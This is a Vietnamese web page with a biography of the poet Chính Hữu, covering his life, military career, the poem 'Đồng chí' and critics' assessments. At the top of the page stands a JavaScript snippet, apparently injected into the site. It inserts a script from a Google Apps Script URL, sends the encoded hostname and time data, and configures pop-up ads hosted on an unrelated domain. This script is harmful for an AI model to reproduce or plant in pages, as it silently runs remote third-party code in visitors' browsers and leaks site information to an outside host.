var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tiểu sử cuộc đời, sự nghiệp sáng tác của nhà thơ Chính Hữu

Chính Hữu là một nhà thơ nổi tiếng trong nền Văn học Việt Nam, những sáng tác của ông luôn để lại trong lòng độc giả nhiều cảm xúc khác nhau. Hãy cùng AnyBooks tìm hiểu về cuộc đời và sự nghiệp của nhà thơ Chính Hữu thông qua bài viết dưới đây nhé!

Tiểu sử cuộc đời, sự nghiệp sáng tác của nhà thơ Chính Hữu

Tiểu sử

Chính Hữu (15 tháng 12 năm 1926 – 27 tháng 11 năm 2007), tên khai sinh là Trần Đình Đắc, Quê ở huyện Can Lộc, tỉnh Hà Tĩnh. Là một nhà thơ Việt Nam.Thơ ông chỉ viết về người lính và 2 cuộc kháng chiến. Ông tham gia 2 cuộc kháng chiến chống Pháp và Mĩ. Ông Nguyên Đại tá, Phó cục trưởng cục Tuyên huấn thuộc Tổng cục chính trị, Quân đội nhân dân Việt Nam, nguyên Phó tổng thư ký Hội Nhà văn Việt Nam. Ông được Nhà nước Việt Nam trao tặng giải thưởng Hồ Chí Minh về văn học và nghệ thuật lần hai (năm 2000).

Ông sinh tại thành phố Vinh, tỉnh Nghệ An. Nguyên quán của ông là huyện Can Lộc (nay là huyện Lộc Hà), tỉnh Hà Tĩnh. Ông học tú tài (triết học) ở Hà Nội trước Cách mạng tháng Tám. Năm 1946, ông gia nhập Trung đoàn Thủ Đô, chiến đấu chống lại quân đội Pháp ở Hà Nội. Sau khi đưa chính phủ đầu não Việt Minh ra khỏi vùng chiến sự, đơn vị của ông rút quân về huyện Đông Anh và sống sót. Ông được đưa đi bồi dưỡng chính trị, làm chính trị viên đại hội (chiến dịch Điện Biên Phủ năm 1954).

Ông làm thơ từ năm 1947 và hầu như chỉ viết về người lính và chiến tranh. Tập thơ Đầu súng trăng treo (1966) là tác phẩm chính của ông. Bài thơ “Đồng chí” được in vào tháng 2-1948. Thơ ông không nhiều nhưng lại có nhiều bài đặc sắc, cảm xúc dồn nén, ngôn ngữ và hình ảnh chọn lọc, hàm súc. Ông đã sáng tác bài thơ “Đồng chí” mà sau này đã được phổ nhạc cho bài hát “Tình đồng chí”. Bài hát đã khơi dậy những xúc động mãnh mẽ trong lòng nhiều thế hệ. Bài thơ là một trong những tác phẩm tiêu biểu nhất viết về người lính cách mạng của văn học thời kháng chiến chống Pháp (1946 – 1954).

Vào 00 giờ 27 phút ngày 27 tháng 11 năm 2007, ông đã qua đời tại bệnh viện Hữu Nghị thành phố Hà Nội.

Tác phẩm

Nhà thơ Chính Hữu có rất nhiều sáng tác hay trong đó có:

Đầu súng trăng treo (tập thơ, Nhà xuất bản Văn học, 1966) gồm 24 bài.

Thơ Chính Hữu (tập thơ, Nhà xuất bản Hội nhà văn, 1977)

Tuyển tập Chính Hữu (Nhà xuất bản Văn học, 1988)

Bài thơ Đồng chí

Trong sáng tác của ông có bài thơ Đồng chí được nhạc sĩ Minh Quốc phổ nhạc và một số bài thơ khác của ông là nguồn cảm hứng cho các nhạc sĩ khác sáng tác như bài hát nổi tiếng “Ngọn đèn đứng gác” của nhạc sĩ Hoàng Hiệp, “Bắc cầu” của nhạc sĩ Quốc Anh, “Có những ngày vui sao” của nhạc sĩ Huy Du.

Phong cách sáng tác

Chính Hữu là một nhà thơ quân đội, trong cuộc đời và sự nghiệp sáng tác của mình ông luôn gắn bó với màu áo xanh của người lính. Những sáng tác của ông đều cống hiến cho sự nghiệp Cách mạng của nước nhà. Là một người lính khi viết thơ về người lính ông luôn mang đến những lời tốt đẹp dành cho họ. Nói về thơ của mình, về nghề chính tác giả Chính Hữu cũng tâm sự rằng: “Thơ phải ngắn ở câu chữ, nhưng phải dài ở sự ngân vang”.

Nổi bật trong sự nghiệp sáng tác của Chính Hữu có bài thơ Đồng chí, bài thơ đã đóng góp cho nền thơ ca dân tộc một bài thơ xuất sắc. Bằng những cảm nhận chân thật nhất tác giả đã viết và thể hiện tình đồng chí giữa các chiến sĩ, tình thương gắn bó giữa nhân dân ta. Bài thơ khơi dậy cho độc giả nhiều cảm xúc mạnh liệt, đây là một trong những bài thơ hay về người lính cách mạng Việt Nam trong thời kháng chiến chống Pháp của nhân dân ta.

Nhận định về Chính Hữu

Trong mạch thơ kháng chiến chống Pháp có nhiều bài thơ hay xúc động về tình đồng đội, tình quan dân như: “Cá nước” của Tố Hữu, “Nhớ” của Hồng Nguyên, “Lên Cấm Sơn” của Thôi Hữu. Đặc biệt bài thơ “Đồng chí” của nhà thơ Chính Hữu đã ghi một dấu ấn sâu đậm – một trong những thi phẩm xuất sắc của thi ca Việt Nam – Nguyễn Ngọc Phú

Hơn thế, với “Đồng chí” Chính Hữu đã có trong tay một tấm căn cước, một thẻ thông hành về thơ để bước lên văn đàn Việt Nam hiện đại. Xem ra câu àm người ta thường nói là quý hồ tinh, bất quý hồ đa, tức là văn chương, nghệ thuật nói chung và thơ ca nói riêng cần hay, tinh túy, chứ không cần nhiều, ứng vào trường hợp của nhà thơ Chính Hữu dường như đúng tuyệt đối. Ông không phải là người thường xuyên có mặt và gây tiếng vang lớn trong quá trình phát triển thơ ca cách mạng, nhưng ngay ở thời kỳ đầu của cuộc kháng chiến chống Pháp, ông đã có một dấu mốc quan trọng với bài thơ Đồng Chí, khiến nhiều đồng nghiệp, đồng chí phải ngỡ ngàng. Thậm chí thơ của ông còn cắm những mốc son, mang tính chất định vị, định hướng cho cả dàn hợp ca thơ cách mạng xét cả về nội dung tư tưởng lẫn phong cách sáng tác. – Đỗ Ngọc Yên

Cảm ơn bạn đọc đã luôn dành sự quan tâm và theo dõi AnyBooks!

Xem thêm:

  • Những tác phẩm văn xuôi hay trong văn học chủ nghĩa lãng mạn Việt Nam
  • Những bài thơ tình bất hủ trong phong trào thơ mới